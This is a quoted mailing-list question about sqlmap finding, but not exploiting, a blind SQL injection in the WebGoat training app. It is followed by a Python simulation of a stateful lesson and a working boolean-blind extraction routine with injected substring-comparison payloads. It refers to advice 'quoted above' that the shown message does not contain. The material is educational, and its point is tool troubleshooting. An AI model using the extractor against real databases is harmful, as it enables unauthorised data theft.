>>>>>>>>>> >> Greetings,
>>>>>>>>>> >> I tried to verify Sqlmap's functionality by running it against Webgoat
>>>>>>>>>> >> version 6.0.1. You can try it yourself by using the following request file.
>>>>>>>>>> >> Just log in and replace the cookie by a valid one.
>>>>>>>>>> >> ###start request file
>>>>>>>>>> >> POST /WebGoat/attack?Screen=4&menu=1100 HTTP/1.1
>>>>>>>>>> >> Host: localhost:8080
>>>>>>>>>> >> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
>>>>>>>>>> >> Accept: */*
>>>>>>>>>> >> Accept-Language: cs,en-US;q=0.7,en;q=0.3
>>>>>>>>>> >> Accept-Encoding: gzip, deflate
>>>>>>>>>> >> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
>>>>>>>>>> >> X-Requested-With: XMLHttpRequest
>>>>>>>>>> >> Referer: http://localhost:8080/WebGoat/start.mvc
>>>>>>>>>> >> Content-Length: 29
>>>>>>>>>> >> Cookie: JSESSIONID=replace
>>>>>>>>>> >> Connection: keep-alive
>>>>>>>>>> >> Pragma: no-cache
>>>>>>>>>> >> Cache-Control: no-cache
>>>>>>>>>> >>
>>>>>>>>>> >> account_number=101&SUBMIT=Go!
>>>>>>>>>> >> #end request file
>>>>>>>>>> >> I am running git master of Sqlmap.
>>>>>>>>>> >> Sqlmap detects SQL injection (boolean based blind Mysql), but no
>>>>>>>>>> >> information gathering commands work (--dbs, --current-user...). I tried
>>>>>>>>>> >> running with --hex or --no-cast, but no luck.
>>>>>>>>>> >> What might be the problem?
>>>>>>>>>> >> Thanks,
>>>>>>>>>> >> Vojta
|
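The advice quoted in the message above, that WebGoat closes the injection point once a request trips its lesson check and that --safe-url/--safe-freq are the workaround, is easiest to see with a small simulation. What follows is an added example and not code from the thread, from sqlmap or from WebGoat: an in-process, SQLite-backed stand-in for such a stateful lesson, and a boolean-blind extractor that optionally visits the "safe" endpoint before every Nth request, the way --safe-freq does. The table layout, the row 'Joe', the trigger keywords SELECT/UNION, the "Account number is valid" marker and the reset() call are all constructed assumptions for the simulation, not WebGoat's real behaviour.

```python
"""Added example, not code from the thread, sqlmap or WebGoat.

Constructed stand-in for a stateful lesson that locks itself once a request
trips its completion check, plus a boolean-blind extractor with an optional
reset cadence (the idea behind sqlmap's --safe-url/--safe-freq). Table layout,
trigger keywords, response strings and reset() are assumptions for the
simulation, not WebGoat's real behaviour."""
import sqlite3
from typing import Optional, Tuple

CONGRATS = "* Congratulations. You have successfully completed this lesson."
VALID = "Account number is valid"          # assumption: the TRUE-page marker
INVALID = "Invalid account number"         # assumption: the FALSE-page marker
TRIGGER_KEYWORDS = ("SELECT", "UNION")     # assumption: what the lesson scans for
# what we want to pull out blind (sqlmap would ask for e.g. the current user)
SUBQUERY = "SELECT first_name FROM user_data WHERE userid = 101"


class StatefulLesson:
    """Vulnerable target: the numeric parameter is concatenated into the SQL."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE user_data(userid INT, first_name TEXT)")
        self.db.execute("INSERT INTO user_data VALUES (101, 'Joe')")  # constructed row
        self.completed = False

    def attack(self, account_number: str) -> str:
        """The injectable endpoint. Once 'completed', every response is the
        congratulation page, so a boolean oracle only ever sees one state."""
        if self.completed:
            return CONGRATS
        try:
            rows = self.db.execute(
                "SELECT first_name FROM user_data WHERE userid = " + account_number
            ).fetchall()
        except sqlite3.Error:
            rows = []
        # the completion check runs after the query is served: this response is
        # still truthful, everything after it is not, until reset() is called
        if any(k in account_number.upper() for k in TRIGGER_KEYWORDS):
            self.completed = True
        return VALID if rows else INVALID

    def reset(self) -> None:
        """The 'safe URL': a harmless request that reopens the lesson."""
        self.completed = False


def oracle(target: StatefulLesson, injected_value: str) -> bool:
    """Boolean-blind oracle: did the TRUE page come back for this value?"""
    return VALID in target.attack(injected_value)


def extract_string(target: StatefulLesson, subquery: str,
                   max_len: int = 16, safe_freq: Optional[int] = None) -> str:
    """Recover `subquery`'s result one character at a time by binary search on
    its code point. safe_freq=N mirrors --safe-freq: hit the safe URL before
    every Nth attack request (None: never, i.e. a run without --safe-url)."""
    result, sent = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if safe_freq and sent % safe_freq == 0:
                target.reset()
            sent += 1
            # substr() past the end is '' and unicode('') is NULL in SQLite, so
            # every comparison is false there and lo stays 0: end of string
            payload = f"101 AND unicode(substr(({subquery}), {pos}, 1)) > {mid}"
            if oracle(target, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def run_both() -> Tuple[str, str]:
    """Same extraction without and with the reset cadence, each on a fresh target."""
    without_reset = extract_string(StatefulLesson(), SUBQUERY)
    with_reset = extract_string(StatefulLesson(), SUBQUERY, safe_freq=1)
    return without_reset, with_reset


if __name__ == "__main__":
    garbage, good = run_both()
    print(f"no safe request: {garbage!r}")   # '@'  (lesson locked after request 1)
    print(f"safe_freq=1:     {good!r}")      # 'Joe'
```

Without the reset only the first payload is answered truthfully; every later request gets the congratulation page, the oracle is stuck on FALSE and the binary search converges on garbage ('@'), which is exactly the "injection found but nothing can be enumerated" symptom from the start of the thread. With safe_freq=1 the lesson is reopened before each request and the value comes back intact. For a real run the sqlmap equivalents are --safe-url pointing at a URL that resets the lesson (the thread does not give it) and --safe-freq set to the number of test requests allowed between two visits to it.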